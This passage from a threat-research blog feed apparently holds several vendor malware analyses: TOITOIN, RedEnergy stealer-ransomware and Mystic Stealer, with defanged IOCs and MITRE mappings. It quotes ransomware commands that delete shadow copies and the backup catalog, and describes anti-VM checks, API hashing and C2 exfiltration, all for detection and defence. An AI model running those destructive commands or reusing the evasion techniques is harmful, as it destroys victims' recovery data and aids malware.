sample transmitted to the Command & Control (C&C) server. If the TOITOIN Trojan is unable to find the INI configuration file containing the URL to the C&C server, it resorts to sending the system information through a curl command. The encrypted data is then sent to the C&C server via a POST request using curl. Figure 32 - Demonstrates the transmission of information to the Command & Control (C&C) server through a CURL POST request. The screenshot below showcases the decrypted data that is sent via a curl POST request, resembling the previously observed request. Figure 33 - Screenshot of the decrypted data that is transmitted through a CURL POST request. Due to the unavailability of the Command and Control (C&C) servers during the analysis, the responses from the server could not be fetched. Exploring The Open Directory While conducting the analysis, researchers came across a decrypted URL, "191[.]252[.]203[.]222/Up/indexW.php," which was found by the InjectorDLL module. Upon exploring the endpoints associated with this URL, it was discovered that an open directory contained various stager modules, including the Loader DLL, Injection DLL, InjectorDLL Module, BypassUAC Module, and the initial Downloader Module. These binaries had been hosted on the server since March 2023. Figure 34 - Reveals the open directory hosting the payloads on the attacker-controlled server. Zscaler Sandbox Coverage Figure 35 - Figure 35 presents the Zscaler Cloud Sandbox Report, which provides detailed analysis and insights into the behavior and characteristics of the analyzed malware. The Zscaler Cloud Sandbox report includes information such as file hashes, observed behaviors, network communications, and potential indicators of compromise (IOCs). It serves as a valuable resource for understanding the malware's capabilities, allowing security analysts to take appropriate measures to protect their systems and networks. The Zscaler Cloud Sandbox Report plays a crucial role in identifying and mitigating potential threats and enhancing overall cybersecurity posture. Win64.Downloader.Toitoin Conclusion In summary, the TOITOIN malware campaign targeting businesses in the Latin American region demonstrates the evolving tactics and sophistication of threat actors. Through deceptive phishing emails, intricate redirect mechanisms, and domain diversification, the threat actors successfully deliver their malicious payload. By leveraging resources such as the Amazon EC2 infrastructure and dynamically generated file names, they have shown their adaptability and persistence in compromising targeted systems. The multi-staged infection chain observed in this campaign involves the use of custom-developed modules that employ various evasion techniques and encryption methods. The malware utilizes XOR decryption to decode configuration files and transmit system information to the command and control server. It also leverages COM Elevation Moniker for user account control bypass, ensuring the execution of malicious code with elevated privileges. The analysis further revealed the presence of downloader modules, injector modules, and backdoors, each playing a specific role in the overall infection chain. The malware payload is injected into legitimate processes, such as explorer.exe and svchost.exe, to evade detection and maintain persistence on compromised systems. Furthermore, the malware exhibits the ability to exfiltrate system information, including computer names, Windows versions, installed browsers, and other relevant data, to the command and control server. The communication with the CnC server occurs through encrypted channels, and in the absence of an INI configuration file, a curl POST request is utilized for data transmission. The analysis also uncovered an open directory hosted on an attacker-controlled server, where various stager modules and payloads were found. These modules, including the Loader DLL, Injection DLL, and BypassUAC module, played critical roles in the infection chain. Overall, this analysis highlights the importance of robust cybersecurity measures and continuous monitoring to detect and mitigate sophisticated threats like TOITOIN. Organizations should remain vigilant against evolving malware campaigns, implement strong security protocols, and regularly update their security systems to safeguard against such threats. By staying informed and proactive, businesses can effectively defend against emerging cyber threats and protect their critical assets. One such measure that provides significant protection against malware threats like TOITOIN is the Zscaler Zero Trust Exchange. The Zscaler ThreatLabz team actively monitors and analyzes such campaigns, ensuring that customers are safeguarded against emerging threats. By leveraging the power of the Zscaler platform, organizations benefit from several key features that enhance their security posture. Firstly, the Zscaler Zero Trust Exchange operates on a zero trust model, which means that all traffic, including email communications and web browsing, is inspected and analyzed in real-time, regardless of the user's location or device. This comprehensive inspection helps identify and block malicious emails, phishing attempts, and suspicious URLs associated with malware campaigns like TOITOIN. Additionally, the Zscaler platform employs advanced threat intelligence and machine learning algorithms to detect and block known and unknown malware variants. The ThreatLabz team constantly updates the platform with the latest threat intelligence, ensuring that customers are protected against emerging threats as soon as they are detected. Furthermore, Zscaler's cloud-native architecture enables rapid deployment of security updates and patches across the entire network, ensuring that customers are always equipped with the latest security defenses. This proactive approach minimizes the window of vulnerability for potential malware attacks. Moreover, the Zscaler Zero Trust Exchange provides granular control over application access and user behavior, limiting the attack surface and reducing the risk of malware infiltration. By implementing strict access policies and enforcing least privilege principles, organizations can prevent unauthorized access and limit the spread of malware within their network. In conclusion, while threats like the TOITOIN malware campaign continue to evolve, the Zscaler Zero Trust Exchange provides a robust and comprehensive security framework to protect organizations against such threats. With continuous monitoring, advanced threat intelligence, proactive updates, and granular access control, Zscaler helps ensure that customers stay one step ahead of emerging malware campaigns. The Zscaler ThreatLabz team's unwavering commitment to customer safety reinforces the effectiveness of the Zscaler Zero Trust Exchange in safeguarding organizations against evolving cyber threats. MITRE ATT&CK TTP Mapping ID Technique Name T1566 Phishing T1064 Scripting T1037 Startup Items T1055 Process Injection T1018 Remote System Discovery T1082 System Information Discovery T1083 File and Directory Discovery T1548.002 Bypass User Account and Control T1574.002 DLL Side-Loading T1055.012 Process Hollowing Indicators of Compromise (IoCs) 1. Downloader Module: 8fc3c83b88a3c65a749b27f8439a8416 2fa7c647c626901321f5decde4273633 ec2-3-89-143-150[.]compute-1[.]amazonaws[.]com/storage[.]php?e=Desktop-PC ec2-3-82-104-156[.]compute-1[.]amazonaws[.]com/storage.php?e=Desktop-PC http[:]//alemaoautopecas[.]com http[:]//contatosclientes[.]services atendimento-arquivos[.]com arquivosclientes[.]online fantasiacinematica[.]online http[:]//cartolabrasil[.]com 2. Krita Loader DLL: b7bc67f2ef833212f25ef58887d5035a 3. InjectorDLL Module 690bfd65c2738e7c1c42ca8050634166 4. ElevateInjectorDLL Module e6c7d8d5683f338ca5c40aad462263a6 191[.]252[.]203[.]222/Up/indexW.php 5. BypassUAC Module c35d55b8b0ddd01aa4796d1616c09a46 6. TOITOIN Trojan 7871f9a0b4b9c413a8c7085983ec9a72 http[:]//bragancasbrasil[.]com http[:]//179[.]188[.]38[.]7 http[:]//afroblack[.]shop/CasaMoveis\ClienteD.php Appendix I: String Decryptor - Downloader Module Appendix II: INI Configuration Decryptor Fri, 07 jul 2023 08:30:02 -0700 Niraj Shivtarkar Ransomware Redefined: RedEnergy Stealer-as-a-Ransomware attacks Summary Zscaler ThreatLabz has discovered a new malware variant, RedEnergy stealer (not to be confused with the australian company Red Energy) that fits into the hybrid Stealer-as-a-Ransomware threat category. RedEnergy stealer uses a fake update campaign to target multiple industry verticals and possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities.The name of the malware was kept due to the common method names observed during the analysis. This blog provides detailed insights into the different campaigns associated with this newly identified malware, along with a technical analysis of its stealer and ransomware characteristics. Introduction During the cybersecurity event Botconf 2023, ThreatLabz unveiled a novel threat category called RAT-as-a-Ransomware in April this year. However, more recently, researchers have identified another hybrid category following a similar approach, now known as Stealer-as-a-Ransomware. This latest discovery of RedEnergy stealer combines silent data theft with encryption to inflict maximum harm and gain control over its victims. It targets multiple industries, including energy utilities, oil, gas, telecom, and machinery. These advancements in malware represent a notable shift and key advancements beyond traditional ransomware attacks. The sample Stealer-as-a-Ransomware variant analyzed in this case study employs a deceptive FAKEUPDATES campaign to lure in its targets, tricking them into promptly updating their browsers. Once inside the system, this malicious variant stealthily extracts sensitive information and proceeds to encrypt the compromised files. This leaves victims vulnerable to potential data loss, exposure, or even the sale of their valuable data. This blog offers a comprehensive analysis of various campaigns associated with this emerging threat, shedding light on its operational aspects. Additionally, ThreatLabz provides a detailed technical overview of the malware, aiding in a better understanding of its behavior and potential countermeasures. Key Takeaways The key takeaways from this research article are: Discovery of RedEnergy Stealer: ThreatLabz latest research uncovers a highly sophisticated malware campaign using industries with reputable LinkedIn pages to target victims, including the Philippines Industrial Machinery Manufacturing Company and several organizations in Brazil. The attackers launch the attack on users that click to visit the website from LinkedIn for a compromised company, using multi-stage techniques and disguise the malware as browser updates to deceive users. Stealer-as-a-Ransomware: the malware analyzed has dual capabilities as both a stealer and ransomware, representing an alarming evolution in ransomware attacks. It employs obfuscation techniques and utilizes HTTPS for command and control communication, making detection and analysis challenging. Multi-Stage Execution: The malware operates through multiple stages, starting with the execution of disguised malicious executables. It establishes persistence, communicates with DNS servers, and downloads additional payloads from remote locations. Suspicious FTP interactions suggest potential data exfiltration and unauthorized file uploads. Ransomware Functionality: The malware includes ransomware modules that encrypt user data with the ".FACKOFF!" extension, rendering it inaccessible until a ransom is paid. It also modifies the desktop.ini file to evade detection and modify file system folder display settings. Deletion of Shadow Drive Data: In its final stage, the malware deletes shadow drive data and Windows backup plans, reinforcing its ransomware characteristics. It drops a batch file and a ransom note, demanding payment in exchange for file decryption. By understanding these key takeaways, organizations can enhance their security posture and better protect themselves from RedEnergy stealer and similar types of malware campaigns. Campaign Zscaler recently made a significant discovery involving a new and sophisticated threat campaign named RedEnergy stealer targeting the Philippines Industrial Machinery Manufacturing Company, as well as other industries with notable LinkedIn pages. These pages typically contain essential company information and website links, making them attractive targets for cybercriminals. Fig 1. - LinkedIn page for Philippines Industrial Machinery Manufacturing The operating mode for this threat campaign involves a deceptive redirection technique. When a user attempts to visit the targeted company's website through their LinkedIn profile, they are unsuspectingly redirected to a malicious website. Once there, they are prompted to install a seemingly legitimate browser update, which is presented as a set of four different browser icons. However, instead of a genuine update, the unsuspecting user unwittingly downloads an executable file known as RedStealer. Fig 2. - Malicious download site Interestingly, regardless of which browser icon the user clicks on, they are redirected to the same URL: www[.]igrejaatos2[.]org/assets/programs/setupbrowser.exe. This URL initiates the download of a file called setupbrowser.exe, which is part of the malicious payload. Fig 3. - Website downloading malicious payload What makes this threat campaign even more insidious is the use of a deceptive download domain called www[.]igrejaatos2[.]org. This domain serves as a disguise, presenting itself as a ChatGpt site to lure victims into downloading a fake offline version of ChatGpt. However, upon downloading the purported ChatGpt zip file, the victim unknowingly obtains the same malicious executable mentioned earlier. Fig 4. - Downloading domain luring users to download fake chatgpt tool It is crucial for individuals and organizations to exercise utmost caution when accessing websites, especially those linked from LinkedIn profiles. Vigilance in verifying the authenticity of browser updates and being wary of unexpected file downloads is paramount to protect against such malicious campaigns. Additional Campaigns In addition to the discovery of the threat campaign targeting the Philippines Industrial Machinery Manufacturing Company, Zscaler's thorough campaign search has uncovered several other related campaigns that exploit the FAKEUPDATES tactic. These campaigns exhibit similar characteristics and techniques, indicating a broader coordinated effort by the cybercriminals behind these attacks. One such campaign involves impersonating a prominent Brazilian telecom company. Like the previously mentioned campaign, this variant directs victims to the same webpage and initiates the download of the identical executable file, www[.]igrejaatos2[.]org/assets/programs/setupbrowser.exe. This indicates that the attackers behind this campaign are reusing their infrastructure and tactics to maximize impact and profits. Fig 5. - Similar campaign leveraging google search Furthermore, a well-known Brazilian cosmetics company has also fallen victim to this malicious campaign, experiencing the same type of attack which downloads the same payload. It is evident that the cybercriminals behind these campaigns are targeting organizations across various industries, leveraging their already established reputations and online presence to deceive unsuspecting users. To gain a deeper understanding of the technical aspects of this malware, let us delve further into its analysis in the sections that follow. By examining the intricacies of the malicious code, security researchers can uncover crucial details about its behavior, functionality, and potential impact on the compromised systems. This information is essential for developing effective countermeasures and mitigating the risks associated with this ongoing threat. Technical Analysis The RedEnergy malware under investigation exhibits a dual functionality, acting both as a stealer and a ransomware. This .NET file, intentionally obfuscated by its author, possesses advanced capabilities to evade detection and hinder analysis. To establish communication with its command and control servers, the malware utilizes HTTPS, adding an additional layer of encryption and obfuscation. Fig 6. - Infection chain The execution of this malware unfolds in three distinct stages, each serving a specific purpose. Each stage is outlined in the sections below. Stage 1: Initial Startup Upon execution, the malicious RedEnergy executable masquerades as part of a legitimate browser update, depicted in Fig. 7 below. It cleverly disguises itself with a legitimate update from one of the various popular browsers, including Google Chrome, Microsoft Edge, Firefox, and Opera, to deceive the user. Notably, looking at the properties of the malicious executable reveals the presence of an invalid certificate, however at surface level this attack hides behind a genuine signed certificate from the user’s browser as shown by the Google example examined in Fig. 8 below. This deceptive tactic aims to instill trust and convince the victim of the authenticity of the update. Fig 7. - Google updater executing the malicious RedEnergy binary Fig 8. - Fake certificate Stage 2: Dropping Files, Persistence, Outgoing Requests, Encrypted Files Dropping Files: In this stage, the malware drops four files onto the victim's system, shown in Fig. 9 below, precisely within the path %USERPROFILE%\AppData\Local\Temp. These dropped files consist of two temporary files and two executables, all following a similar pattern with filenames beginning with "tmp" and four randomly generated hexadecimal characters, followed by the ".exe" extension: tmp[4 random hex characters].exe. Among the executable files, one serves as the malicious payload, while the other disguises itself as the legitimate, digitally signed Google Update. The benign executable possesses the hash value 8911b376a5cd494b1ac5b84545ed2eb2 and is responsible for performing the actual update of Google Chrome, thereby further deceiving the victim. Simultaneously, the malware executes another background process, identified by the MD5 hash cb533957f70b4a7ebb4e8b896b7b656c, which represents the true malicious payload. During execution, this payload displays an inappropriate message on the victim's screen, displayed in Fig. 10 below, most likely as part of the threat actor's intent to cause distress or confusion. Fig 9. - Dropping malicious file in temp directory Fig 10. - Display message after executing the binary Persistence: Persistence is a critical aspect of malware, enabling it to maintain its presence on an infected system even after rebooting or shutting down. To achieve persistence, the malicious executable stores files in the Windows startup directory. It creates an entry within the start menu (Start Menu\Programs\Startup) and initiates an immediate reboot, ensuring that the malware is executed once the system is up and running again. This persistence mechanism guarantees that the malware remains active and continues its malicious operations even after system restarts. Outgoing Requests: During the analysis of the malware, researchers utilized Fakenet, a Windows malware analysis tool that simulates network activity, to gain insights into its behavior. Through Fakenet, they discovered that the malicious tmp.exe file established communication with the DNS server, depicted in Fig. 11 below. To delve deeper into the network interactions, the widely used packet analysis tool, Wireshark, was employed. This allowed researchers to identify the specific DNS query made by the malicious tmp.exe file, providing crucial information for further investigation, as shown in Fig. 12 below. It was observed that upon establishing a connection with the DNS server, tmp.exe was expected to initiate the download of an executable file from cdn.discord. Unfortunately, during this particular analysis, the Command and Control (CnC) server was unavailable, making it impossible to obtain a sample. However, another sample resembling the final payload was discovered, which had been hosted on the same domain just two days prior to the current analysis. Fig 11. - Malicious binary communication with CnC server Fig 12. - Network communication seen via Wireshark Additionally, suspicious activity involving File Transfer Protocol (FTP) was uncovered during the investigation. A user with the username "alulogrofp" successfully accessed a private system hosted by OVH, a renowned cloud computing company and one of the largest hosting providers globally. The user's credentials were authenticated, granting them access to a restricted directory, which was identified as the root directory ("/"). Notably, UTF-8 encoding was enabled for file transfers, indicating support for international character sets. Fig 13. - FTP interaction on OVH private system Within the FTP session, the user navigated to the "/assets/bootstrap/css" directory, following standard directory traversal practices. To ensure efficient and accurate file transfers, the transfer mode was set to binary (8-bit). Subsequently, the server entered passive mode and provided an IP address and port number, indicated by the message "Entering Passive Mode (51,68,11,192,115,132)". By combining the extracted data, the IP address 51.68.11[.]192 was obtained. Further interactions revealed that the user requested a file list using the "NLST" command, resulting in the retrieval of six matching files. In another session, the client initiated a file retrieval operation using the "RETR" command, specifying the file path as "assets/bootstrap/css/SPP". The server acknowledged the data connection and confirmed the acceptance of the file transfer. These FTP interactions raised concerns regarding potential data exfiltration, as well as the possibility of uploading files using the same method. Encrypted Files: With ransomware modules integrated into the payload, the malware proceeded to encrypt the user's data, appending the ".FACKOFF!" extension to each encrypted file, as shown in Fig. 14 below. This malicious software is specifically designed to lock the user's files, rendering them inaccessible until a ransom is paid. After the encryption process is completed, the user receives a ransom message, demanding payment in exchange for restoring access to their files. Failure to comply with the ransom demands results in the permanent loss of access to the compromised data. Furthermore, the malicious executable alters the desktop.ini file, which contains configuration settings for the file system folders. By modifying this file, the malware can manipulate how the file system folders are displayed, potentially further concealing its presence and activities on the infected system. This alteration serves as an attempt to mislead the user and impede the detection of the malware's impact on the file system. Fig 14. - Encrypted files with .FACKOFF! extension Stage 3: Decryption Routine The final stage payload is responsible for various actions, including dropping the ransom note and executing multiple commands and stealer functionalities, and for encryption it uses the RijndaelManaged algorithm. Within the payload, numerous functions are named RedEnergy, giving rise to its namesake. In the second stage, the malware downloads the executable SystemPropertiesProtection.exe via the discord cdn. This leads to the third stage, where the malware executes a series of actions typically associated with ransomware. It begins by deleting data from the shadow drive, effectively removing any potential backups. The malware also targets Windows backup plans, further hindering the user's ability to recover their data. Additionally, a batch file is executed, and a ransom note is dropped, indicating the user's files have been encrypted. Furthermore, the malware possesses stealer capabilities, allowing it to exfiltrate the user's data. Notably, the Config method, shown in Fig. 15 below, plays a crucial role in decrypting key information. It stores important strings related to the stealer functionality in a dictionary, depicted in Fig. 16, which is used to construct command lines for further operations. Fig 15. - Config decryption function Fig 16. - Malware showcasing stealer capabilities One such decrypted command line, shown in Figure 17, modifies the boot configuration to ignore failures and disables the automatic recovery options in Windows. The payload also drops specific files in the Temp directory, as seen in Figure 18, using it as a camouflage to conceal its malicious intent. Among the files dropped, C.bin serves as a payload, while a batch file contains commands to terminate processes and perform cleanup tasks associated with the payload. Figure 19 illustrates the instructions executed by the batch file. Fig 17. - Command line executed post decryption Fig 18. - Dropping supporting files in temp directory Fig 19. - Content inside batch file Furthermore, the payload is programmed to delete all volume shadow copies (VSS), the backup catalog, and shadow copies using the Windows Management Instrumentation Command-line (WMIC). The following command lines exemplify this process: C:\Windows\System32\cmd.exe /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete C:\Windows\System32\cmd.exe /C wbadmin delete catalog -quiet Additionally, the payload undergoes a three-stage process to gather antivirus (AV) information. Based on this information, it generates a string that it sends to the Command and Control (CnC) server as a User Agent, as depicted in Figure 20 below. During the analysis, it was observed that the AV detected is Windows Defender. STM, RSM, and RZ likely provide additional information related to Windows Defender. Lastly, the payload is responsible for dropping the final ransom note, read_it.txt, shown in Figure 21. This note is placed in all the folders where file encryption occurs, serving as a notification to the user that their files have been encrypted and demanding a ransom for their release. Fig 20. - User Agent built from malicious code storing AV information Fig 21. - Screenshot of the ransom note Zscaler Sandbox Coverage Zscaler's security sandbox actively detects indicators for this threat, helping Zscaler customers defend against such attacks automatically, as shown in Fig. 22 below. Fig 22. - Zscaler sandbox report The following threat names are detected by Zscaler's multilayered cloud security platform for identifying malicious payloads: Win32.Downloader.RedEnergyStealer Conclusion In conclusion, the analysis of the malware campaign targeting the Philippines Industrial Machinery Manufacturing Company, along with other industries through reputable LinkedIn pages, has revealed a highly sophisticated and multi-stage attack. This campaign involves the distribution of malware disguised as browser updates, leading unsuspecting users to malicious websites where they unknowingly download the RedStealer executable. Notably, similar campaigns have been observed targeting companies in Brazil, highlighting the broad reach of this threat. The technical analysis of the malware has exposed its dual functionality as both a stealer and ransomware, representing a concerning evolution in the development of ransomware-like attacks. The malware employs obfuscation techniques and leverages HTTPS for command and control communication, making it challenging to detect and analyze. It operates through multiple stages, starting with the execution of the malicious executable masquerading as a browser update. Subsequently, it drops files, establishes persistence, and initiates outgoing requests to communicate with DNS servers and download additional payloads from remote locations. The discovery of suspicious FTP interactions raises further concerns about potential data exfiltration and unauthorized file uploads. The malware's ransomware modules are responsible for encrypting user data using the ".FACKOFF!" extension, rendering it inaccessible until a ransom is paid. Additionally, the alteration of the desktop.ini file enhances the malware's ability to evade detection and manipulate file system folder display settings. The final stage of the malware execution involves the deletion of shadow drive data and Windows backup plans, solidifying its ransomware characteristics. A batch file is executed, and a ransom note is dropped, demanding payment in exchange for decrypting the files. Furthermore, the malware exhibits stealer functionalities, enabling the theft of user data. Overall, this analysis highlights the evolving and highly sophisticated nature of cyber threats targeting various industries and organizations. It emphasizes the critical importance of implementing robust security measures, fostering user awareness, and ensuring prompt incident response to effectively mitigate the impact of such attacks. By remaining vigilant and implementing comprehensive cybersecurity strategies, businesses can better protect themselves against these malicious campaigns and safeguard their valuable data. Zscaler's ThreatLabz team remains dedicated to monitoring these threats and sharing their findings with the wider community. It is crucial for individuals and organizations to stay informed and take necessary precautions to defend against malware attacks. This includes regularly updating software, using strong passwords, and exercising caution when encountering suspicious emails or messages. By collectively addressing these challenges, we can enhance the security of our digital landscape and mitigate the risks associated with evolving cyber threats. MITRE ATT&CK TTP Mapping ID Tactic Technique T1036 Defense Evasion Masquerading T1185 Collection Browser Session Hijacking T1070.006 Defense Evasion Timestomp T1560 Collection Archive Collected Data T1027 Defense Evasion Obfuscated Files or Information T1562.001 Defense Evasion Disable or Modify Tools Indicators Of Compromise (IOCs) Main Payload fb7883d3fd9347debf98122442c2a33e Downloading Domain www[.]igrejaatos2[.]org/assets/programs/setupbrowser[.]exe Dropper Payload cb533957f70b4a7ebb4e8b896b7b656c Connecting Domain 2no[.]co Final Payload 642dbe8b752b0dc735e9422d903e0e97 Wed, 21 jun 2023 08:29:48 -0700 Shatak Jain Mystic Stealer Key Points Mystic Stealer is a new information stealer that was first advertised in April 2023 Mystic steals credentials from nearly 40 web browsers and more than 70 browser extensions The malware also targets cryptocurrency wallets, Steam, and Telegram The code is heavily obfuscated making use of polymorphic string obfuscation, hash-based import resolution, and runtime calculation of constants Mystic implements a custom binary protocol that is encrypted with RC4 How do you know when something is in hot demand in the underground economy? The same way you do in the real world – the market becomes flooded. This is the story of information stealers today. "Stealers" are a kind of malware designed to run on an endpoint post-compromise, while their primary features center on the theft of user data. Oftentimes this is credential data, but it can be any data that may have financial value to an adversary; this includes paid online service accounts, cryptocurrency wallets, instant messenger, or email contacts lists, etc. Stealers also bridge the realms of criminal and nation-state focus. Many espionage-focused threat groups operate stealer families for pilfering information from target networks. Credential information can further increase access or penetration into an environment. Demand for compromised credentials to fuel criminal access to user accounts and target networks has resulted in a steady stream of newly developed information-stealing malware, keeping account markets stocked. With the amount of visibility we have at Zscaler, we are accustomed to encountering new threats on a daily basis. Enter Mystic Stealer, a fresh stealer lurking in the cyber sphere, noted for its data theft capabilities, obfuscation, and an encrypted binary protocol to enable it to stay under the radar and evade defenses. Together with our colleagues at InQuest, we present a deep dive technical analysis of the malware. We also share indicators from an in-depth analysis of the infrastructure footprint of deployed Mystic Stealer controllers and countermeasures for detecting the client in your environment. Note: the content of this blog is also hosted by InQuest here. The Data Heist Specialist Mystic Stealer focuses on data theft, exhibiting capabilities that allow it to pilfer a wide array of information. For starters, it is designed to collect computer information such as the system hostname, user name, and GUID. It also identifies a likely system user geolocation using the locale and keyboard layout. But it doesn't stop there. Key Mystic Stealer functions include its ability to extract data from web browsers and cryptocurrency wallets. Like many stealers, it collects auto-fill data, browsing history, arbitrary files, cookies, and information related to cryptocurrency wallets. Whether it's Bitcoin, DashCore, Exodus, or any other popular crypto wallet, Mystic Stealer has it covered. Mystic can also steal Telegram and Steam credentials. Interestingly, the stealer does not require the integration of third-party libraries for decrypting or decoding target credentials. Some leading stealer projects download DLL files post-install to implement functionality to extract credentials from files on the local system. Instead, Mystic Stealer collects and exfiltrates information from an infected system and then sends the data to the command & control (C2) server that handles parsing. This is a different approach from many leading stealers and is likely an alternate design to keep the size of the stealer binary smaller and the intention less clear to file analyzers. The Mystic Stealer crimeware is implemented in C for the client and Python for the control panel. Technical Analysis Looking at the existing releases, it seems clear that the developer of Mystic Stealer is looking to produce a stealer on par with the current trends of the malware space while attempting to focus on anti-analysis and defense evasion. In terms of capabilities, it's a fairly standard set of functionality as seen with many stealers today. The malware collects system information which is packaged together for a check-in to the C2 server: Keyboard layout Locale CPU information Number of CPU processors Screen dimensions Computer name Username Running processes System architecture Operating system version Key data theft functionality includes the ability to capture history and auto-fill data, bookmarks, cookies, and stored credentials from nearly 40 different web browsers. In addition, it collects Steam and Telegram credentials as well as data related to installed cryptocurrency wallets. The malware targets more than 70 web browser extensions for cryptocurrency theft and uses the same functionality to target two-factor authentication (2FA) applications. The approach used by Mystic Stealer is similar to what was reported for Arkei Stealer. Further details on targeted browsers, cryptocurrency plugins, and 2FA apps are available in the appendix. Depending on a configuration provided by the C2 server, the malware will capture a screenshot of the desktop, which is exfiltrated to the C2 server. On May 20, the Mystic Stealer seller posted updates that include loader functionality and a persistence capability to forums as shown in Figure 1. Loader refers to the ability to download and execute additional malware payloads. This is reflective of a continuing trend where loaders allow one threat actor to support the distribution of affiliate malware being loaded on compromised devices. This is already a notable risk for many organizations due to the use of malware distribution networks and initial access brokers for the distribution of high-severity payloads like ransomware. It underscores the need to take preventative steps to ensure a security posture that reduces the risk of malware delivery and footholds early on in attack campaigns. Figure 1. MysticStealer forum post advertising v1.2 update with loader support As previously noted, there are several anti-analysis and evasion features additionally present in Mystic Stealer: Binary expiration. The trojan will terminate execution if the running build is older than a specified date. This is likely an execution guardrail that attempts to prevent anti-malware researchers and sandboxes that analyze the sample much later than when it was intended to be distributed or executed on victim machines. Figure 2 shows a Mystic Stealer sample that retrieves the current system time and compares the value to 1685318914 (0x6473ED02), which when converted from an epoch to a timestamp translates to Sun May 28 17:08:34 2023. Figure 2. Example Mystic Stealer date expiration feature Anti-virtualization. Mystic Stealer is configurable and some samples contain anti-VM features, detecting hypervisor runtime environments, and avoiding execution. This is helpful for avoiding execution in sandbox environments but it isn't always effective. Mystic uses the CPUID assembly instruction to detect virtual environments by inspecting the result for specific values that are indicative of virtualization software. In particular, the code checks for the manufacturer ID string (with a length of 12 bytes) for the following values: “XenVMMXenVMM” (Xen HVM) “VMwareVMware” (VMware) “Microsoft Hv” (Microsoft Hyper-V) “ KVMKVMKVM “ (KVM) “prl hyperv “ (Parallels) “VBoxVBoxVBox” (VirtualBox) This detection code is likely derived from Pafish. Windows APIs imported by hash. The stealer resolves and dynamically loads Windows APIs using a custom XOR based hashing algorithm represented in the Python snippet shown below: Note that the constant value (e.g., 0x240CE91) changes between Mystic samples. The malware walks the export tables for the following Windows DLLs and hashes each export name until a match is found: Kernel32.dll Advapi32.dll Kernel32.dll Gdiplus.dll Crypt32.dll User32.dll Ws2_32.dll Ole32.dll Gdi32.dll Ntdll.dll Dynamic constant calculation. Constant values in the code are obfuscated and dynamically calculated at runtime. For example, the API hashing algorithm shown above uses the constant 0x240CE91. However, this constant does not directly exist in the code. Instead, the value 0x240CEA6 is present and the code performs an XOR operation with the value 0x37 to produce the actual constant 0x240CE91 as shown in Figure 3. Figure 3. Example Mystic Stealer constant obfuscation technique Encrypted binary custom protocol. The client communicates with the C2 server using a custom protocol over TCP, which we discuss in more depth later. Polymorphic string obfuscation. We identified that the malware obfuscates strings using a library that is very similar to ADVobfuscator. The obfuscator generates code at compile time that builds strings on the stack, which are then decrypted at runtime. The obfuscation is polymorphic, and therefore, every sample will contain strings that are uniquely encrypted with simple mathematical operations such as addition, subtraction, and XOR. As a result, this technique may bypass static antivirus signatures and complicate malware reverse engineering. The Mystic Stealer seller refers to this obfuscation as a morpher that obfuscates builds with full undetectability (FUD) in sales threads. In one forum, the seller advertised that the project's morpher enabled the bypass of SmartScreen, which members identified as a dubious claim based on the operation of obfuscators and SmartScreen. Some forum users suspected the use of an open-source obfuscator. This ended up as a point of contention in the forum, lowering the perception and trust of the project with some users. C2 Communication Mystic Stealer communicates with its command and control (C2) servers using a custom binary protocol over TCP. The client sends a hello message containing a constant 4 byte value (0x946F19B5) to the C2 server. The C2 responds with 256 bytes of binary data that is used as an RC4 key for all subsequent communications. The client obtains the machine GUID from the registry value SOFTWARE\Microsoft\Cryptography\MachineGuid. The client encrypts the GUID value (along with this GUID length) using RC4 and sends it to the C2 server. The format of packets received from the server consists of a 4 byte big endian data size value followed by the data buffer. All data is encrypted with RC4. The C2 server responds back with a binary configuration of the actions to perform (steal credentials, take screenshots, steal cryptocurrency wallets, etc). This configuration is structured by 1’s and 0’s representing whether to enable or disable a feature, respectively. Data stolen from the infected system is labeled with specific binary tags that identify the type of information when it is sent to the C2 server. Unlike most stealers that will harvest data in full and then exfiltrate it to a C2 server with a single request, Mystic Stealer will collect various types of information and immediately send the data to a C2 server on-the-fly without storing or writing data to the disk, which may be detected by EDR/antivirus applications. The builder enables operators to specify up to four C2 endpoints. This is often used in crimeware to provide resiliency in case some servers are offline or blocklisted. In Mystic Stealer binaries, there are two arrays consisting of 4 DWORDs each that are encrypted with a modified XTEA-based algorithm. Thus, each sample can configure up to 4 IP addresses and ports. A Python-based implementation of the decryption algorithm for Mystic C2s is shown below: A few generations of the C2 servers seem to utilize a default port of 16287/tcp as seen in Figure 4 of the control panel builder dialog posted in a sales thread on underground forums. We have not observed file samples where this port was utilized for the configured C2 servers. The following C2 ports have been observed in identified samples, providing some clustering by build configurations: 15555/tcp 15556/tcp 13219/tcp Figure 4. Mystic Stealer control panel builder dialog C2 server footprint The stealer has been linked to multiple server-hosting IP addresses across a diverse geographic spectrum, including but not limited to registrations in France, Germany, Russia, the United States, and China. We list C2 servers identified by the hosting panel and C2 callbacks in the appendix. Large commercial hosting provider Hetzner (AS24940) accounts for nearly half of the hosts in addition to a number at OVH (AS16276). However, we also note a number of servers within the Latvian, Bulgarian and Russian hosting spheres. These include: Aeza Group Ltd (AS210644) GIR-AS (AS207713) Partner-AS / LetHost LLC (AS204603) Scalaxy B.V. (AS58061) Sukhoi Su-57 LLC (AS46308) WAICORE-TRANSIT (AS202973) Some of these providers stand out as potential contenders in the realm of bulletproof hosting, a term that sets off alarm bells in the cybersecurity world. Bulletproof hosting providers are entities that offer services with a particular appeal to individuals and groups engaged in nefarious activities, due to the providers' lax enforcement of legal norms and frequent protection and misdirection efforts that they take on behalf of criminal clientele. These services are often used to host malware, command and control servers, phishing campaigns, and other illicit digital operations. InQuest and Zscaler note a particular tendency of operators of credential stealers and other malware as a service (MaaS) systems to utilize protected backend hosting in the underground services space. This strategy often affords greater capabilities in blocklist avoidance as well as the reduced impact of takedown efforts and law enforcement reach. The "Grand" cluster One particular cluster of C2 servers sticks out when searching for hosted control panels. We have labeled this the "Grand" cluster based on WHOIS artifacts seen with some domains. We have included a list of these domains in the appendix. This group of domains is noted to share the following attributes: Cloudflare nameservers and CDN fronting Nameservers: meadow, jimmy Registration details: Domains registered mid-late 2022 Registrar: Public Domain Registry (PDR Ltd.) Registrant State/Province: Novosibirskaya oblast Registrant Country: RU Registrant: Grand (grand.bbs[@] We note that while the majority of domains follow the above registration convention, a few outliers exist. For example, the domain alchemistwallet[.]io is registered with NetEarth One Inc., and one or more domains use different authoritative nameserver pairs (amit, jacqueline; rosalyn, stan). One or more domains were additionally registered in 2023. Several of these domains were mentioned in a note by FalconFeedsio. We believe that these domains were likely picked up from domain aftermarket resale, a tactic that can yield tangible value for an adversary. Already-registered domains carry established reputation attributes 